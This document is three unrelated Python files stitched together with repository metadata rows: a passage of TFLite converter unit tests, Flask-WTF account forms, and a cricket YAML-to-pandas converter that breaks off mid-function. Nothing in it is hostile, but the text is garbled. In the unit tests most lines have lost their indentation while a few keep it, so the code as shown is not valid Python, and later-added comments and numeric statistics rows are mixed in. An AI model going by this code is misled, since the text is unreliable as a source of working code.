self.assertIn(tfl_model.OperatorCodes(0).BuiltinCode(),
(tflite.BuiltinOperator.SPLIT_V, tflite.BuiltinOperator.SPLIT))
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 3)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 3)
def test_repeated_list_output(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.split(x, 1, 1)
return list(y) + list(y)
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertIn(tfl_model.OperatorCodes(0).BuiltinCode(),
(tflite.BuiltinOperator.SPLIT_V, tflite.BuiltinOperator.SPLIT))
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 6)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 3)
def test_input_output_with_noop(self):
class TestModel(nn.Module):
def forward(self, x):
y = x.view(x.shape)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.RESHAPE)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_branch_output_with_noop(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.split(x, 1, 1)
return [t.view(t.shape) for t in y]
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertIn(tfl_model.OperatorCodes(0).BuiltinCode(),
(tflite.BuiltinOperator.SPLIT_V, tflite.BuiltinOperator.SPLIT))
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 3)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 3)
def test_branch_output_with_noop_complex(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.split(x, 1, 1)
left = [t.view(t.shape) for t in y]
right = [F.relu(t) for t in y]
return list(y) + left + right
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
# TODO: Optimize this case
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 10)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 9)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 10)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 3)
split_output_indices = tfl_model.Subgraphs(0).Operators(0).OutputsAsNumpy().tolist()
split_output_names = [tfl_model.Subgraphs(0).Tensors(i).Name() for i in split_output_indices]
for i in range(1, 10):
input_idx = tfl_model.Subgraphs(0).Operators(i).Inputs(0)
input_name = tfl_model.Subgraphs(0).Tensors(input_idx).Name()
self.assertIn(input_name, split_output_names)
def test_simple_transpose(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.permute(x, [0, 2, 3, 1])
y = torch.permute(y, [0, 3, 1, 2])
y = F.relu(y)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.RELU)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_unary_elementwise_transpose(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.permute(x, [0, 2, 3, 1])
y = F.relu(y)
y = torch.permute(y, [0, 3, 1, 2])
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.RELU)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_binary_elementwise_transpose(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.permute(x, [0, 2, 3, 1])
y = torch.add(y, y)
y = torch.permute(y, [0, 3, 1, 2])
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.ADD)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_simple_reshape(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.reshape(x, (3, 224, 224))
y = torch.reshape(y, (1, 3, 224, 224))
y = F.relu(y)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.RELU)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
    def test_unary_elementwise_reshape(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.reshape(x, (3, 224, 224))
y = F.relu(y)
y = torch.reshape(y, (1, 3, 224, 224))
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.RELU)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
    def test_binary_elementwise_reshape(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.reshape(x, (3, 224, 224))
y = torch.add(y, y)
y = torch.reshape(y, (1, 3, 224, 224))
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.ADD)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_pad_with_paired_reshape_and_transpose(self):
class TestModel(nn.Module):
def forward(self, x):
y = torch.permute(x, [0, 2, 3, 1])
y = torch.reshape(y, (224, 224, 3))
y = F.pad(y, (1, 1), "constant", 0)
y = torch.reshape(y, (1, 224, 224, 5))
y = torch.permute(y, [0, 3, 1, 2])
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(1, 3, 224, 224)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.PAD)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_fold_buffer(self):
class TestModel(nn.Module):
def __init__(self) -> None:
super().__init__()
self.register_parameter('weight', nn.Parameter(torch.randn(50, 40, dtype=torch.float32)))
self.register_parameter('bias', nn.Parameter(torch.randn(40, dtype=torch.float32)))
def forward(self, x):
y = torch.addmm(self.bias, x, self.weight)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(10, 50)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.FULLY_CONNECTED)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_fold_shared_buffer(self):
class TestModel(nn.Module):
def __init__(self) -> None:
super().__init__()
self.register_parameter('weight', nn.Parameter(torch.randn(50, 40, dtype=torch.float32)))
self.register_parameter('bias', nn.Parameter(torch.randn(40, dtype=torch.float32)))
def forward(self, x):
y = torch.cat([torch.addmm(self.bias, x, self.weight) for _ in range(5)], dim=0)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(10, 50)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 6)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 6)
for i in range(5):
self.assertEqual(tfl_model.OperatorCodes(tfl_model.Subgraphs(0).Operators(
i).OpcodeIndex()).BuiltinCode(), tflite.BuiltinOperator.FULLY_CONNECTED)
self.assertEqual(tfl_model.Subgraphs(0).Operators(i).OutputsLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(tfl_model.Subgraphs(0).Operators(
5).OpcodeIndex()).BuiltinCode(), tflite.BuiltinOperator.CONCATENATION)
self.assertEqual(tfl_model.Subgraphs(0).Operators(5).OutputsLength(), 1)
def test_fuse_activation(self):
class TestModel(nn.Module):
def forward(self, x):
y = F.relu(x + 1)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(10, 50)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.ADD)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
builtin_opts = tfl_model.Subgraphs(0).Operators(0).BuiltinOptions()
self.assertIsNotNone(builtin_opts)
        opts = tflite.AddOptions()  # the operator under test is ADD, not FULLY_CONNECTED
        opts.Init(builtin_opts.Bytes, builtin_opts.Pos)
self.assertEqual(opts.FusedActivationFunction(), tflite.ActivationFunctionType.RELU)
def test_fuse_matmul_add(self):
class TestModel(nn.Module):
def __init__(self) -> None:
super().__init__()
self.register_parameter('weight', nn.Parameter(torch.randn(50, 40, dtype=torch.float32)))
self.register_parameter('bias', nn.Parameter(torch.randn(40, dtype=torch.float32)))
def forward(self, x):
y = torch.matmul(x, self.weight)
y = torch.add(y, self.bias)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(10, 50)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.FULLY_CONNECTED)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).InputsLength(), 3)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
def test_fuse_mm_add(self):
class TestModel(nn.Module):
def __init__(self) -> None:
super().__init__()
self.register_parameter('weight', nn.Parameter(torch.randn(50, 40, dtype=torch.float32)))
self.register_parameter('bias', nn.Parameter(torch.randn(40, dtype=torch.float32)))
def forward(self, x):
y = torch.mm(x, self.weight)
y = torch.add(y, self.bias)
return y
model = TestModel()
model.eval()
dummy_input = torch.randn(10, 50)
model_path = get_model_path()
converter = TFLiteConverter(model, dummy_input, model_path, input_transpose=False)
converter.convert()
tfl_model = parse_model(model_path)
self.assertEqual(tfl_model.OperatorCodesLength(), 1)
self.assertEqual(tfl_model.OperatorCodes(0).BuiltinCode(), tflite.BuiltinOperator.FULLY_CONNECTED)
self.assertEqual(tfl_model.SubgraphsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).InputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OutputsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).OperatorsLength(), 1)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).InputsLength(), 3)
self.assertEqual(tfl_model.Subgraphs(0).Operators(0).OutputsLength(), 1)
if __name__ == '__main__':
unittest.main()
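# Usage note (added; not part of the original source): assuming the `tflite`,
# `torch` and `tinynn` dependencies are installed, this file can be run
# directly (python converter_unit_test.py) or through the standard runner
# (python -m unittest tests.converter_unit_test).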
| 40.986248 | 106 | 0.640974 | 2,438 | 20,862 | 5.306809 | 0.059475 | 0.089658 | 0.164168 | 0.20977 | 0.912815 | 0.905395 | 0.895115 | 0.88128 | 0.876411 | 0.871077 | 0 | 0.030884 | 0.237945 | 20,862 | 508 | 107 | 41.066929 | 0.782929 | 0.00115 | 0 | 0.823678 | 0 | 0 | 0.004703 | 0.001536 | 0 | 0 | 0 | 0.001969 | 0.312343 | 1 | 0.100756 | false | 0 | 0.015113 | 0 | 0.209068 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0036b524faa6f5bf7b1000f7380d87e0ab72ae4a | 3,269 | py | Python | real_estate_analysis/app/app/users/forms.py | enyquist/Real_Estate_Analysis | 47bbcfbc9bece20ae2aa0fce84dfca700ec6842f | [
"MIT"
] | null | null | null | real_estate_analysis/app/app/users/forms.py | enyquist/Real_Estate_Analysis | 47bbcfbc9bece20ae2aa0fce84dfca700ec6842f | [
"MIT"
] | null | null | null | real_estate_analysis/app/app/users/forms.py | enyquist/Real_Estate_Analysis | 47bbcfbc9bece20ae2aa0fce84dfca700ec6842f | [
"MIT"
] | null | null | null | from flask_wtf import FlaskForm
from flask_login import current_user
import wtforms as forms
import wtforms.validators as validators
import real_estate_analysis.app.app.models as models
class RegistrationForm(FlaskForm):
username = forms.StringField(label='Username', validators=[validators.DataRequired(), validators.Length(min=2, max=20)])
email = forms.StringField(label='Email', validators=[validators.DataRequired(), validators.Email()])
password = forms.PasswordField(label='Password', validators=[validators.DataRequired()])
confirm_password = forms.PasswordField(label='Confirm Password', validators=[validators.DataRequired(), validators.EqualTo('password')])
submit = forms.SubmitField(label='Sign Up')
def validate_username(self, username):
user = models.User.query.filter_by(username=username.data).first()
if user:
raise validators.ValidationError('That username is taken. Please choose a different username')
def validate_email(self, email):
user = models.User.query.filter_by(email=email.data).first()
if user:
raise validators.ValidationError('That email is taken. Please choose a different email')
class LoginForm(FlaskForm):
email = forms.StringField(label='Email', validators=[validators.DataRequired(), validators.Email()])
password = forms.PasswordField(label='Password', validators=[validators.DataRequired()])
remember = forms.BooleanField(label='Remember Me')
submit = forms.SubmitField(label='Login')
class UpdateAccountForm(FlaskForm):
username = forms.StringField(label='Username', validators=[validators.DataRequired(), validators.Length(min=2, max=20)])
email = forms.StringField(label='Email', validators=[validators.DataRequired(), validators.Email()])
submit = forms.SubmitField(label='Update')
def validate_username(self, username):
if username.data != current_user.username:
user = models.User.query.filter_by(username=username.data).first()
if user:
raise validators.ValidationError('That username is taken. Please choose a different username')
def validate_email(self, email):
if email.data != current_user.email:
user = models.User.query.filter_by(email=email.data).first()
if user:
raise validators.ValidationError('That email is taken. Please choose a different email')
class RequestResetForm(FlaskForm):
email = forms.StringField(label='Email', validators=[validators.DataRequired(), validators.Email()])
    submit = forms.SubmitField(label='Request Password Reset')
def validate_email(self, email):
user = models.User.query.filter_by(email=email.data).first()
if user is None:
raise validators.ValidationError('There is no account with the provided email. Please register for an account')
class ResetPasswordForm(FlaskForm):
password = forms.PasswordField(label='Password', validators=[validators.DataRequired()])
confirm_password = forms.PasswordField(label='Confirm Password',
validators=[validators.DataRequired(), validators.EqualTo('password')])
submit = forms.SubmitField(label='Reset Password')
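# --- Usage sketch (added; not part of the original source) ---
# A minimal sketch of how RegistrationForm is typically wired into a Flask
# view; the blueprint and template names below are assumptions:
#
#   @users.route('/register', methods=['GET', 'POST'])
#   def register():
#       form = RegistrationForm()
#       if form.validate_on_submit():   # also runs the validate_* hooks above
#           ...                         # create the user, then redirect
#       return render_template('register.html', form=form)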
| 48.791045 | 140 | 0.719486 | 360 | 3,269 | 6.480556 | 0.208333 | 0.094299 | 0.150879 | 0.144021 | 0.777111 | 0.753965 | 0.753965 | 0.753965 | 0.753965 | 0.753965 | 0 | 0.002199 | 0.165188 | 3,269 | 66 | 141 | 49.530303 | 0.852693 | 0 | 0 | 0.54 | 0 | 0 | 0.143775 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.18 | 0.1 | 0 | 0.64 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
cc4b6cbc57e06f981a1195c9b3fc6758d9d78f85 | 171,714 | py | Python | yorkpy/analytics.py | tvganesh/yorkpy | bf555a702c5d2c7d779c84d0dcf707c6d9a84bb9 | [
"MIT"
] | 4 | 2018-12-28T06:43:16.000Z | 2020-04-01T08:29:56.000Z | yorkpy/analytics.py | tvganesh/yorkpy | bf555a702c5d2c7d779c84d0dcf707c6d9a84bb9 | [
"MIT"
] | 5 | 2019-08-19T21:33:28.000Z | 2020-07-20T05:37:35.000Z | build/lib/yorkpy/analytics.py | tvganesh/yorkpy | bf555a702c5d2c7d779c84d0dcf707c6d9a84bb9 | [
"MIT"
] | 4 | 2019-03-18T05:51:26.000Z | 2020-11-29T18:11:39.000Z | import os
import yaml
import json
import pandas as pd
import matplotlib.pyplot as plt
from pylab import rcParams
import seaborn as sns
import numpy as np
from sklearn.linear_model import LinearRegression
import glob
import time
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 27 Dec 2018
# Function: convertYaml2PandasDataframeT20
# This function converts yaml files to Pandas dataframe and saves as CSV
#
###########################################################################################
def convertYaml2PandasDataframeT20(infile,source,dest):
'''
    Converts and saves a T20 yaml file to a pandas dataframe
    Description
    This function converts a T20 Yaml file from the source directory to a pandas data frame.
    The data frame is then stored as a .csv file. The saved file is of the format
    team1-team2-date.csv, e.g. Kolkata Knight Riders-Sunrisers Hyderabad-2016-05-22.csv etc.
Usage
convertYaml2PandasDataframeT20(yamlFile,sourceDir=".",targetDir=".")
Arguments
yamlFile
The yaml file to be converted to dataframe and saved
sourceDir
The source directory of the yaml file
targetDir
The target directory in which the data frame is stored as RData file
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
    convertAllYaml2PandasDataframesT20
Examples
    # In the example below ../yamldir contains the yaml files
convertYaml2PandasDataframeT20("225171.yaml",".","../data")
'''
    os.chdir(source)
    # the yaml file is opened relative to the source directory set above
# Read Yaml file and convert to json
print('Converting file:',infile)
    with open(infile) as f:
        a=yaml.load(f, Loader=yaml.FullLoader)  # pass an explicit Loader; bare yaml.load() is deprecated
# 1st innings
deliveries=a['innings'][0]['1st innings']['deliveries']
#Create empty dataframe for team1
team1=pd.DataFrame()
# Loop through all the deliveries of 1st innings and append each row to dataframe
for i in range(len(deliveries)):
df = pd.DataFrame(deliveries[i])
b= df.T
team1=pd.concat([team1,b])
# Rename batsman to striker/non-striker as there is another column batsman who scored runs
team1=team1.rename(columns={'batsman':'striker'})
    # All extras column names (0 is the column pd.Series produces for
    # deliveries that have no extras entry)
    extras=[0,'wides','byes','legbyes','noballs','penalty']
if 'extras' in team1: #Check if extras are there
# Get the columns in extras for team1
b=team1.extras.apply(pd.Series).columns
# Find the missing extras columns
diff= list(set(extras) - set(b))
print('Team1:diff:',diff)
# Rename extras dict column as there is another column extras which comes from runs_dict
team1=team1.rename(columns={'extras':'extras_dict'})
#Create new columns by splitting dictionary columns - extras and runs
team1=pd.concat([team1,team1['extras_dict'].apply(pd.Series)], axis=1)
# Add the missing columns
for col in diff:
print("team1:",col)
team1[col]=0
team1=team1.drop(columns=0)
else:
print('Team1:Extras not present')
# Rename runs columns to runs_dict
if 'runs' in team1: #Check if runs in team1
team1=team1.rename(columns={'runs':'runs_dict'})
team1=pd.concat([team1,team1['runs_dict'].apply(pd.Series)], axis=1)
else:
print('Team1:Runs not present')
if 'wicket' in team1: #Check if wicket present
# Rename wicket as wicket_dict dict column as there is another wicket column
team1=team1.rename(columns={'wicket':'wicket_dict'})
team1=pd.concat([team1,team1['wicket_dict'].apply(pd.Series)], axis=1)
else:
print('Team1: Wicket not present')
team1['team']=a['innings'][0]['1st innings']['team']
team1=team1.reset_index(inplace=False)
#Rename index to delivery
team1=team1.rename(columns={'index':'delivery'})
# 2nd innings - Check if the 2nd inning was played
if len(a['innings']) > 1: # Team2 played
deliveries=a['innings'][1]['2nd innings']['deliveries']
#Create empty dataframe for team1
team2=pd.DataFrame()
# Loop through all the deliveries of 1st innings
for i in range(len(deliveries)):
df = pd.DataFrame(deliveries[i])
b= df.T
team2=pd.concat([team2,b])
# Rename batsman to striker/non-striker as there is another column batsman who scored runs
team2=team2.rename(columns={'batsman':'striker'})
# Get the columns in extras for team1
if 'extras' in team2: #Check if extras in team2
b=team2.extras.apply(pd.Series).columns
diff= list(set(extras) - set(b))
print('Team2:diff:',diff)
# Rename extras dict column as there is another column extras which comes from runs_dict
team2=team2.rename(columns={'extras':'extras_dict'})
#Create new columns by splitting dictionary columns - extras and runs
team2=pd.concat([team2,team2['extras_dict'].apply(pd.Series)], axis=1)
# Add the missing columns
for col in diff:
print("team2:",col)
team2[col]=0
team2=team2.drop(columns=0)
else:
print('Team2:Extras not present')
# Rename runs columns to runs_dict
if 'runs' in team2:
team2=team2.rename(columns={'runs':'runs_dict'})
team2=pd.concat([team2,team2['runs_dict'].apply(pd.Series)], axis=1)
else:
print('Team2:Runs not present')
if 'wicket' in team2:
# Rename wicket as wicket_dict column as there is another column wicket
team2=team2.rename(columns={'wicket':'wicket_dict'})
team2=pd.concat([team2,team2['wicket_dict'].apply(pd.Series)], axis=1)
else:
print('Team2:wicket not present')
team2['team']=a['innings'][1]['2nd innings']['team']
team2=team2.reset_index(inplace=False)
#Rename index to delivery
team2=team2.rename(columns={'index':'delivery'})
else: # Create empty columns for team2 so that the complete DF as all columns
team2 = pd.DataFrame()
cols=['delivery', 'striker', 'bowler', 'extras_dict', 'non_striker',\
'runs_dict', 'wicket_dict', 'wides', 'noballs', 'legbyes', 'byes', 'penalty',\
'kind','player_out','fielders',\
'batsman', 'extras', 'total', 'team']
team2 = team2.reindex(columns=cols)
#Check for missing columns. It is possible that no wickets for lost in the entire innings
cols=['delivery', 'striker', 'bowler', 'extras_dict', 'non_striker',\
'runs_dict', 'wicket_dict', 'wides', 'noballs', 'legbyes', 'byes', 'penalty',\
'kind','player_out','fielders',\
'batsman', 'extras', 'total', 'team']
# Team1 - missing columns
msngCols=list(set(cols) - set(team1.columns))
print('Team1-missing columns:', msngCols)
for col in msngCols:
print("Adding:team1:",col)
team1[col]=0
# Team2 - missing columns
msngCols=list(set(cols) - set(team2.columns))
print('Team2-missing columns:', msngCols)
for col in msngCols:
print("Adding:team2:",col)
team2[col]=0
# Now both team1 and team2 should have the same columns. Concatenate
team1=team1[['delivery', 'striker', 'bowler', 'extras_dict', 'non_striker',\
'runs_dict', 'wicket_dict', 'wides', 'noballs', 'legbyes', 'byes', 'penalty',\
'kind','player_out','fielders',\
'batsman', 'extras', 'total', 'team']]
team2=team2[['delivery', 'striker', 'bowler', 'extras_dict', 'non_striker',\
'runs_dict', 'wicket_dict', 'wides', 'noballs', 'legbyes', 'byes', 'penalty',\
'kind','player_out','fielders',\
'batsman', 'extras', 'total', 'team']]
df=pd.concat([team1,team2])
#Fill NA's with 0s
df=df.fillna(0)
# Fill in INFO
print("Length of info field=",len(a['info']))
#City
try:
df['city']=a['info']['city']
except:
df['city'] =0
#Date
df['date']=a['info']['dates'][0]
#Gender
df['gender']=a['info']['gender']
#Match type
df['match_type']=a['info']['match_type']
# Neutral venue
try:
df['neutral_venue'] = a['info']['neutral_venue']
except KeyError as error:
df['neutral_venue'] = 0
#Outcome - Winner
try:
df['winner']=a['info']['outcome']['winner']
# Get the win type - runs, wickets etc
df['winType']=list(a['info']['outcome']['by'].keys())[0]
print("Wintype=",list(a['info']['outcome']['by'].keys())[0])
#Get the value of wintype
winType=list(a['info']['outcome']['by'].keys())[0]
print("Win value=",list(a['info']['outcome']['by'].keys())[0] )
# Get the win margin - runs,wickets etc
df['winMargin']=a['info']['outcome']['by'][winType]
print("win margin=", a['info']['outcome']['by'][winType])
except:
df['winner']=0
df['winType']=0
df['winMargin']=0
# Outcome - Tie
try:
df['result']=a['info']['outcome']['result']
df['resultHow']=list(a['info']['outcome'].keys())[0]
df['resultTeam'] = a['info']['outcome']['eliminator']
print(a['info']['outcome']['result'])
print(list(a['info']['outcome'].keys())[0])
print(a['info']['outcome']['eliminator'])
except:
df['result']=0
df['resultHow']=0
df['resultTeam']=0
try:
df['non_boundary'] = a['info']['non_boundary']
except KeyError as error:
df['non_boundary'] = 0
try:
